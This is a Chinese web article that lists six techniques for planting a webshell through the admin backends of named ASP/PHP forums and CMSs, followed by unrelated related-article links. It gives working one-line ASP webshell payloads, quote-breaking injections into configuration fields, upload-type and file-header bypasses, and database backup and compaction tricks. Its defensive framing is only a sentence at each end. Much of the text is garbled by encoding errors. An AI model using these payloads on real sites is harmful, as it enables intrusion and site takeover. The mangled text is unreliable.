六種后臺拿shell的方法

　　一直以來很多網(wǎng)站都被植入了很多后門，這里簡單的分下黑客常用的手段，方便管理員或站長注意防御！以下六種后臺拿shell的方法，希望大家都能了解！

　　一、直接上傳獲得

　　這種對php和jsp的一些程序比較常見，MolyX BOARD就是其中一例，直接在心情圖標管理上傳.php類型，雖然沒有提示，其實已經(jīng)成功了，上傳的文 件url應(yīng)該是/imsges/smiles下，以前的聯(lián)眾游戲站和網(wǎng)易的jsp系統(tǒng)漏洞就可以直接上傳jsp文件。文 件名是原來的文件名，bo-blog后臺可以可以直接上傳.php文件，上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網(wǎng) 5.0和6.0、早期的許多整站系統(tǒng))，因過濾上傳文件不嚴，導(dǎo)致用戶可以直接上傳webshell到網(wǎng)站任意可寫目錄中，從而拿到網(wǎng)站的管理員控制權(quán) 限。

　　二、添加修改上傳類型

　　現(xiàn)在很多的腳本程序上傳模塊不是只允許上傳合法文件類型，而大多數(shù)的系統(tǒng)是允許 添加上傳類型，bbsxp后臺可以添加asa|asP類型，ewebeditor的后臺也可添加asa類型,通過修改后我們可以直接上傳asa后綴的 webshell了,還有一種情況是過濾了.asp，可以添加.aspasp的文件類型來上傳獲得webshell。php系統(tǒng)的后臺，我們可以添 加.php.g1f的上傳類型，這是php的一個特性,最后的哪個只要不是已知的文件類型即可，php會將php.g1f作為.php來正常運行,從而也 可成功拿到shell。LeadBbs3.14后臺獲得webshell方法是：在上傳類型中增加asp ，注意，asp后面是有個空格的，然后在前臺上傳ASP馬，當(dāng)然也要在后面加個空格！

　　三、利用后臺管理功能寫入

　　上傳漏洞基本上補的也差不多了,所以我們進入后臺后還可以通過修改相關(guān)文件來寫入webshell。比較的典型的有dvbbs6.0，還有 leadbbs2.88等，直接在后臺修改配置文件，寫入后綴是asp的文件。而LeadBbs3.14后臺獲得webshell另一方法是：添加一個新 的友情鏈接，在網(wǎng)站名稱處寫上冰狐最小馬即可,最小馬前后要隨便輸入一些字符，http:\網(wǎng)站incIncHtmBoardLink.asp就 是我們想要的shell。

　　四、利用后臺管理向配置文件寫

　　利用"""":""//"等符號 構(gòu)造最小馬寫入程序的配置文件，joekoe論壇，某某同學(xué)錄，沸騰展望新聞系統(tǒng)，COCOON Counter統(tǒng)計程序等等，還有很多php程序都可以，COCOON Counter統(tǒng)計程序舉例，在管理郵箱處添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//"，還有一種方法就是寫上 cnhacker@263.net"%＞＜%eval request(chr(35))%＞＜%'，這樣就會形成前后對應(yīng)，最小馬也就運行了。＜%eval request(chr(35))%＞可以用lake2的eval發(fā)送端以及最新的2006 客戶端來連，需要說明的是數(shù)據(jù)庫插馬時候要選前者。再如動易2005，到文章中心管理-頂部菜單設(shè)置-菜單其它特效，插入一句話"%＞＜%execute request("l")%＞＜%'，保 存頂部欄目菜單參數(shù)設(shè)置成功后，我們就得到馬地址http://網(wǎng)站/admin/rootclass_menu_config.asp。

　　五、利用后臺數(shù)據(jù)庫備份及恢復(fù)獲得

　　主要是利用后臺對access數(shù)據(jù)庫的“備份數(shù)據(jù)庫”或“恢復(fù)數(shù)據(jù)庫”功能，“備份的數(shù)據(jù)庫路徑”等變量沒有過濾導(dǎo)致可以把任意文件后綴改 為asp，從而得到webshell，msssql版的程序就直接應(yīng)用了access版的代碼，導(dǎo)致sql版照樣可以利用。還可以備份網(wǎng)站asp文件為其 他后綴 如.txt文件，從而可以查看并獲得網(wǎng)頁源代碼，并獲得更多的程序信息增加獲得webshell的機會。在實際運用中經(jīng)常會碰到?jīng)]有上傳功能的時 候，但是有asp系統(tǒng)在運行，利用此方法來查看源代碼來獲得其數(shù)據(jù)庫的位置，為數(shù)據(jù)庫馬來創(chuàng)造機會，動網(wǎng)論壇就有一個ip地址的數(shù)據(jù)庫，在后臺的ip管理 中可以插入最小馬然后備份成.asp文件即可。在談?wù)勍黄粕蟼鳈z測的方法，很多asp程序在即使改了后綴名后也會提示文件非法，通過在.asp文件頭加上 gif89a修改后綴為gif來騙過asp程序檢測達到上傳的目的，還有一種就是用記事本打開圖片文件，隨便粘貼一部分復(fù)制到asp木馬文件頭，修改 gif后綴后上傳也可以突破檢測，然后備份為.asp文件，成功得到webshell。

　　六、利用數(shù)據(jù)庫壓縮功能

　　可以將數(shù)據(jù)的防下載失效從而使插入數(shù)據(jù)庫的最小馬成功運行，比較典型的就是loveyuki的L-BLOG，在友情添加的url出寫上<%eval request="">, 提交后，在數(shù)據(jù)庫操作中壓縮數(shù)據(jù)庫，可以成功壓縮出.asp文件，用海洋的最小馬的eval客戶端連就得到一個webshell。

　　由上可知道我們最好將一些不常用的功能關(guān)閉，關(guān)閉部分目錄可執(zhí)行目錄的權(quán)限，禁止修改配置文件等等，注意與服務(wù)器結(jié)合好。

【六種后臺拿shell的方法】相關(guān)文章：

高考改革后六種學(xué)生更容易拿高分11-26

關(guān)于唱歌拿話筒的姿勢方法11-01

新托福考試拿高分的方法10-22

六種方法寫出“真情實感”的寫作方法推薦03-21

英語六級作文如何拿高分的方法11-27

后臺朋友作文2篇08-22

后臺朋友作文3篇12-31

給比拿快樂作文04-05

拿不走的記憶作文12-30

小孩拿燈籠簡筆畫09-22